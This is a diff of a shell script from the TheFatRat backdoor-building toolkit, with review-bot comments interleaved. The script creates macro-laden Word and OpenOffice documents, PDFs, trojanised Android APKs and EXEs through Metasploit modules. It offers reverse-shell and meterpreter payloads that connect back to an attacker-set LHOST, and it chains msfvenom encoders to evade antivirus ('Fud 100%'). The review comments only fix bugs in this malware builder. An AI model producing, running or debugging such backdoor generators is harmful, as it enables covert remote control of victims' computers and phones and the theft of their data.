350 --height 265) > /dev/null 2>&1 + pldmac spinlong echo "" echo "" @@ -2169,7 +3232,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp 
@@ -2194,23 +3257,21 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi elif [ $exe != 'n' ] && [ $exe != 'N' ] then #payload y - echo "" - exef=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your backdoor executable file"); + selexe fi - echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "generic/shell_reverse_tcp" --width 350 --height 265) > /dev/null 2>&1 + pldmac spinlong echo "" echo "" @@ -2220,7 +3281,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp @@ -2245,13 +3306,13 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi ;; 
@@ -2260,7 +3321,8 @@ fi echo -e $red" Apache OpenOffice on Windows (PSH) " echo -e $okegreen"" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2283,7 +3345,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp microsploit fi @@ -2298,8 +3360,8 @@ fi fi echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong + pldwin + spinlong echo "" echo "" gboor @@ -2308,7 +3370,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/misc/openoffice_document_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.odt" >> $meterp @@ -2331,13 +3393,13 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.odt " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi ;; 
@@ -2345,7 +3407,8 @@ fi 5) echo -e $red" Apache OpenOffice on Linux (PSH) " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2368,7 +3431,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp microsploit fi @@ -2383,8 +3446,8 @@ fi fi echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - spinlong + pldmul + spinlong echo "" echo "" gboor @@ -2393,7 +3456,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/misc/openoffice_document_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.odt" >> $meterp @@ -2416,13 +3479,13 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.odt " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi ;; 
@@ -2459,7 +3522,8 @@ rm -rf temp/* sleep 2 echo "Done!" echo -e $okegreen"" -echo -e $yellow " Your local IP address is : $lanip" +echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] 
@@ -2479,32 +3543,38 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp embedapk fi echo "" -copyfile=$(zenity --file-selection --file-filter='APK files (apk) | *.apk' --title="Select your app/game apk file"); -cp $copyfile $path/temp/app.apk >/dev/null 2>&1 +selapk +cp $exef $path/temp/app.apk >/dev/null 2>&1 apkt="$path/temp/app.apk" if [ ! -f $apkt ]; then - zenity --no-wrap --error --text="`printf "There was a problem copying your APK file \n to a temporary location \n try with other apk ."`" - read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key + echo "" +echo -e $red "There was a problem copying your apk file to final destination ." + read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key menu fi echo "" -payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 +pldand echo "" echo "" spinlong echo "" sleep 1 -method=$(zenity --list --radiolist --column "Pick" --column "Action" TRUE "Use Backdoor-apk 0.2.2" FALSE "Use old Fatrat method" --text="Select tool to create apk :"); -case $method in - -"Use Backdoor-apk 0.2.2") +echo -e $orange "+------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Use Backdoor-apk 0.2.2$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Use old Fatrat method$orange |" +echo -e $orange "+------------------------------+" +echo "" +echo -ne $cyan "Select Tool to create apk : ";tput sgr0 +read apkto +case $apkto in +1) echo "" spinlong outf="app_backdoor.apk" 
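Review bot: `cp $exef $path/temp/app.apk` reads `exef`, a variable the removed code never used, right after `selapk`; elsewhere in this commit `exef` is what `selexe` produces, so unless `selapk` (not in the diff) also assigns `exef`, the copy silently uses whatever an earlier `selexe` run left behind, or an empty value, and the user only sees the copy-failure message. Worth confirming which variable `selapk` sets and naming it explicitly here. The new error text `There was a problem copying your apk file to final destination .` also misdescribes the step — the target is the temporary `$path/temp/app.apk`, as the old wording said; `There was a problem copying your apk file to a temporary location , try with other apk .` keeps the message accurate.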
@@ -2519,12 +3589,12 @@ echo $yourport >> $apkconfig ./backdoor_apk echo "" sleep 2 - read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key + read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key clear menu ;; -"Use old Fatrat method") +2) echo -e $okegreen "" spinlong @@ -2550,7 +3620,7 @@ echo -e $red "" echo "[x] There was an error in the creation of the payload . Check log file at : $log" rm -rf temp/* > /dev/null 2>&1 -read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key +read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key clear menu fi @@ -2599,7 +3669,7 @@ echo "[x] There was an error in the creation of your RAT APK file , the possible - It was not possible to inject the payload in the hook you selected (in this case select a different hook point) Check log file at : $log" echo -e $okegreen "" -read -rsp $'Press any key to return to fatrat menu\n' -n 1 key +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key menu fi @@ -2636,7 +3706,7 @@ echo "[x] There was an error copying your Rat app to final destination . Check log file at : $log" rm -rf temp/* > /dev/null 2>&1 echo -e $okegreen "" - read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key + read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key menu fi 
@@ -2649,27 +3719,8 @@ echo "[*] Removing temporary files" sleep 2 rm -rf $path/temp/* >/dev/null 2>&1 echo "[✔] Done!" -zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`" -if [ $? = 0 ] ; then -save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="myapk"); -svf=$path/config/listeners/$save.rc -rm -rf $svf >/dev/null 2>&1 -echo "use exploit/multi/handler" > $svf -echo "set PAYLOAD $payload" >> $svf -echo "set LHOST $yourip" >> $svf -echo "set LPORT $yourport" >> $svf -echo "exploit -j" >> $svf -echo -e $okegreen "Configuration file saved to $list/$save.rc" -fi -echo -e $okegreen "" -read -rsp $'Press any key to return to fatrat menu\n' -n 1 key -echo -clear -menu -;; -*) -clear -menu +echo "" +crlst ;; esac } @@ -2720,11 +3771,12 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo echo -ne $okegreen" └─────► " ;tput sgr0 read fatrat1 - if test $fatrat1 == '1' #NUMBER 1 BEBE - then + case $fatrat1 in +1) echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] 
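Review bot: Removing the `*)` arm together with the listener block leaves `case $apkto in` with only `1)` and `2)`, so any other answer to `Select Tool to create apk` falls straight out of the `esac` and the function returns to its caller with no message; the old code cleared the screen and went back to `menu`. Restoring a default arm, `*) clear; menu ;;`, before `esac` keeps that behaviour. The `case` header itself is in the earlier `@@ -2479,32 +3543,38 @@` hunk, outside this one.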
@@ -2747,12 +3799,12 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong +pldwin +spinlong echo "" echo "" gboor @@ -2769,12 +3821,12 @@ fi echo -e $okegreen"" echo -e "Backdoor Saved To output Folder " PwnWinds - - elif test $fatrat1 == '2' #cPAGAR-POWERSHELL - then +;; +2) echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" echo -e $okegreen "" @@ -2797,12 +3849,12 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong +pldwin +spinlong echo "" echo "" gboor 
@@ -2827,21 +3879,21 @@ fi echo -e $okegreen"" echo -e "Backdoor Saved To output Folder " echo "" - echo -ne " Press any key to continue ......... " + echo -ne " Press [ENTER] key to continue ......... " read continue PwnWinds - - elif test $fatrat1 == '3' #Apachecompler - then +;; +3) echo "" echo -e $okegreen"" echo -e $okegreen " Starting Apache Server wait ..." - service apache2 start > /dev/null 2>&1 + /etc/init.d/apache2 start > /dev/null 2>&1 echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2864,12 +3916,12 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong +pldwin +spinlong echo "" echo "" gboor 
@@ -2891,15 +3943,16 @@ fi echo -e $okegreen"" echo -e " Backdoor Saved To output Folder " echo "" - echo -ne " Press any key to continue ......... " + echo -ne " Press [ENTER] key to continue ......... " read continue PwnWinds - elif test $fatrat1 == '4' #C AJA - then +;; +4) echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2922,12 +3975,12 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong +pldwin +spinlong echo "" echo "" gboor @@ -2952,16 +4005,17 @@ fi echo -e $okegreen"" echo -e " Backdoor Saved To output Folder " echo "" - echo -ne " Press any key to continue ......... " + echo -ne " Press [ENTER] key to continue ......... " read continue PwnWinds - elif test $fatrat1 == '5' #PDF+POWERSHELL+C - then +;; +5) echo echo -e $yellow" Worked on Adobe Reader v8.x, v9.x / Windows XP SP3 / Windows 7/Vista ( English )" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] 
@@ -2984,7 +4038,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi @@ -2993,8 +4047,7 @@ fi read embedpdf if [ -z "$embedpdf" ]; then embedpdf="$path/PE/original.pdf" -fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 +fipldwin spinlong echo "" echo "" @@ -3023,15 +4076,16 @@ fi echo -e $okegreen"" echo -e $yellow" Backdoor PDF Saved To output Folder " echo "" - echo -ne $okegreen" Press any key to continue ......... " + echo -ne $okegreen" Press [ENTER] key to continue ......... " read continue PwnWinds - - elif test $fatrat1 == '6' #C Meteperter_reverse_tcp - then +fi +;; +6) echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -3054,7 +4108,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi 
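Review bot: `+fipldwin` in the `@@ -2993,8 +4047,7 @@` hunk looks like a fused `fi` and `pldwin`: as written it is an unknown command, and the `if [ -z "$embedpdf" ]` stays open until the `+fi` added after `PwnWinds` in the `@@ -3023,15 +4076,16 @@` hunk, so whenever the user supplies a custom PDF path the whole build branch is skipped. Replace it with the two lines `fi` and `pldwin`, and drop the extra `fi` before `;;` in the later hunk. The enclosing case arm starts outside these hunks.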
@@ -3249,11 +4303,12 @@ fi read aw PwnWinds - elif test $fatrat1 == '7' #C Staging Protocol Meteperter - then +;; +7) echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -3276,7 +4331,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi @@ -3372,14 +4427,16 @@ fi read aw PwnWinds - elif test $fatrat1 == '8' - then +;; +8) clear menu - else +;; +*) PwnWinds -fi +;; +esac } @@ -3487,7 +4544,7 @@ read LABEL echo "" #Check for Metasploit -if [[ "$MSFVENOM" != "" || "$MSFCONSOLE" != "" ]]; then +if [[ "$msfvenom" != "" || "$msfconsole" != "" ]]; then echo "" else echo "" @@ -3501,7 +4558,8 @@ fi #ITER=`seq 5 10 |sort -R |sort -R | head -1` ITER=`shuf -i 10-20 -n 1` echo -e $okegreen"" -echo -e $yellow "Your local IP address is : $lanip" +echo -e $yellow "Your local IPV4 address is : $lanip" + echo -e $yellow "Your local IPV6 address is : $lanip6" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -3521,7 +4579,7 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp avoid fi 
@@ -3533,7 +4591,7 @@ echo "" echo "" spinlong #Payload creater -$MSFVENOM -p "$PAYLOAD" LHOST="$yourip" LPORT="$yourport" EXITFUNC=thread -f raw | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null | $MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 --platform linux -f raw 2>/dev/null | $MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 --platform win -f raw 2>/dev/null | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 --platform win -f c > msf.c 2>/dev/null +$msfvenom -p "$PAYLOAD" LHOST="$yourip" LPORT="$yourport" EXITFUNC=thread -f raw | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null | $MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 --platform linux -f raw 2>/dev/null | $MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 --platform win -f raw 2>/dev/null | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 --platform win -f c > msf.c 2>/dev/null echo "" echo "" @@ -3592,7 +4650,7 @@ if [ "$LEVEL" = "1" ]; then echo "" spinlong2 SEED=$(shuf -i 100000-500000 -n 1) -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3604,7 +4662,7 @@ elif [ "$LEVEL" = "2" ]; then echo "" spinlong2 SEED=$(shuf -i 1000000-5000000 -n 1) -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3616,7 +4674,7 @@ elif [ "$LEVEL" = "3" ]; then echo "" spinlong2 SEED=$(shuf -i 8000000-12000000 -n 1) -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3628,7 +4686,7 @@ elif [ "$LEVEL" = "4" ]; then echo "" spinlong2 SEED=$(shuf -i 40000000-60000000 -n 1) -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu 
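Review bot: Only the first stage of the encoder pipeline in `@@ -3533,7 +4591,7 @@` was renamed to `$msfvenom`; the four `$MSFVENOM -e ...` stages still use the upper-case name, which the check in `@@ -3487,7 +4544,7 @@` on the previous line no longer validates. If `$MSFVENOM` is empty the unquoted expansion vanishes and each stage tries to run `-e` as a command, so `msf.c` ends up empty and the failure is hidden by `2>/dev/null`. Rename the remaining stages to `$msfvenom` (or keep both names assigned) and consider dropping the `2>/dev/null` so encoder errors are visible; the surrounding block starts and ends outside the hunk.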
@@ -3640,7 +4698,7 @@ elif [ "$LEVEL" = "5" ]; then echo "" spinlong2 SEED=$(shuf -i 100000000-200000000 -n 1) -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3705,7 +4763,7 @@ rm build.c >/dev/null 2>&1 rm random >/dev/null 2>&1 rm msf.c >/dev/null 2>&1 rm msfhandler.rc >/dev/null 2>&1 -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3736,12 +4794,14 @@ echo -e $white "http://www.linuxsec.org/" echo echo -e $red "Dana James Traversie - (backdoor-apk)" echo +echo -e $cyan "z0noxz - (powerstager)" +echo echo -e $white "peterpt" echo echo -e $red "Big Thanks to : http://www.github.com/" echo echo "" -echo -n -e $okegreen "Press any key to return to menu" +echo -n -e $okegreen "Press [ENTER] key to return to menu" read back clear menu @@ -3753,7 +4813,6 @@ clear ################################################################### menu () { clear - resize -s 46 76 > /dev/null echo -e $okegreen"" echo -e $okegreen" ____ " echo -e $okegreen" | | " @@ -3778,7 +4837,7 @@ menu () { echo -e $white " " echo -e $white" [$okegreen"01"$white]$okegreen Create Backdoor with msfvenom" - echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor [Slow but Powerfull] " + echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor with Fudwin 1.0" echo -e $white" [$okegreen"03"$white]$okegreen Create Fud Backdoor with Avoid v1.2 " echo -e $white" [$okegreen"04"$white]$okegreen Create Fud Backdoor with backdoor-factory [embed] " echo -e $white" [$okegreen"05"$white]$okegreen Backdooring Original apk [Instagram, Line,etc] " @@ -3804,10 +4863,7 @@ menu () { elif test $fatrat == '2' then - chmod +x powerfull.sh - xterm -fa monaco -fs 13 -bg black ./powerfull.sh -clear -menu + fudwin elif test $fatrat == '3' then 
@@ -3818,27 +4874,52 @@ menu echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" echo -e $okegreen"" - read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira; - embed=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your executable file"); - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "cave_miner_inline" FALSE "iat_reverse_tcp_inline" FALSE "iat_reverse_tcp_inline_threaded" FALSE "iat_reverse_tcp_stager_threaded" FALSE "iat_user_supplied_shellcode_threaded" FALSE "meterpreter_reverse_https_threaded" FALSE "reverse_shell_tcp_inline" FALSE "reverse_tcp_stager_threaded" FALSE "user_supplied_shellcode_threaded" --width 350 --height 300) > /dev/null 2>&1 - spinlong - if [ ! -f "$embed" ];then - echo -e $red "You did not setected any executable file" - read -ne " Press any key to return to menu ." - menu +if [ ! -f "$defcon" ] +then +yourip="" +yourport="" +fi + if [ -z "$yourip" ]; then + read -p ' Set LHOST IP: ' yourip fi - echo "" - echo "" + echo -e $okegreen "" + if [ -z "$yourport" ]; then + read -p ' Set LPORT: ' yourport + fi + read -p ' Please enter the base name for output files (ex : myapp : ' fira +invalid +if [ $err == "1" ] +then +echo -e $okegreen "" +echo -n "Press [ENTER] key to return to menu ." 
+read inp +menu +fi +selexe + pldbkf + echo "" gboor spinlong2 echo "" echo -e $okegreen"" - $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe - echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press any key to continue" + $backdoor -f $exef -s $payload -H $yourip -P $yourport -o output/$fira.exe +outf="$path/backdoored/output/$fira.exe" +if [ ! -f $outf ] +then +echo "" +echo -e $red "Backdoor factory was not able to compile your backdoor in the specific exe ." +echo "" +echo -n -e $okegreen"Press [ENTER] any key to return to menu" + read back +clear + menu +fi + echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press [ENTER] key to continue" read bebeku clear menu @@ -3938,7 +5019,7 @@ menu cd .. cd .. echo "" - echo -ne $red" [*] $cyan Folders cleaned, press any key to return to the main menu." + echo -ne $red" [*] $cyan Folders cleaned, Press [ENTER] key to return to the main menu." read anjeng menu @@ -3971,7 +5052,6 @@ fi # MENU FATRAT ################################################################### clear -resize -s 46 76 > /dev/null echo -e $okegreen"" echo -e $okegreen" ____ " echo -e $okegreen" | | " @@ -3996,7 +5076,7 @@ echo echo -e $white " " echo -e $white" [$okegreen"01"$white]$okegreen Create Backdoor with msfvenom" - echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor [Slow but Powerfull] " + echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor with Fudwin 1.0" echo -e $white" [$okegreen"03"$white]$okegreen Create Fud Backdoor with Avoid v1.2 " echo -e $white" [$okegreen"04"$white]$okegreen Create Fud Backdoor with backdoor-factory [embed] " echo -e $white" [$okegreen"05"$white]$okegreen Backdooring Original apk [Instagram, Line,etc] " @@ -4022,10 +5102,7 @@ echo elif test $fatrat == '2' then - chmod +x powerfull.sh - xterm -fa monaco -fs 13 -bg black ./powerfull.sh - clear - menu + fudwin elif test $fatrat == '3' then 
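Review bot: The new output check `if [ ! -f $outf ]` leaves `$outf` unquoted although it is built from the user-typed base name `$fira`; a name containing spaces makes `[` fail with "too many arguments" so the check is skipped, and an empty name silently produces `output/.exe`. Quote it as `if [ ! -f "$outf" ]`, quote `$exef` and `$fira` in the `$backdoor` invocation, and reject an empty `$fira` before calling `$backdoor`. The duplicated copy of this branch in the `@@ -4033,34 +5110,47 @@` hunk on the next lines has the same unquoted invocation but no output check at all, and `Press [ENTER] any key` reads like a leftover from the search-and-replace. The enclosing `elif test $fatrat == '4'` chain starts outside the hunk.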
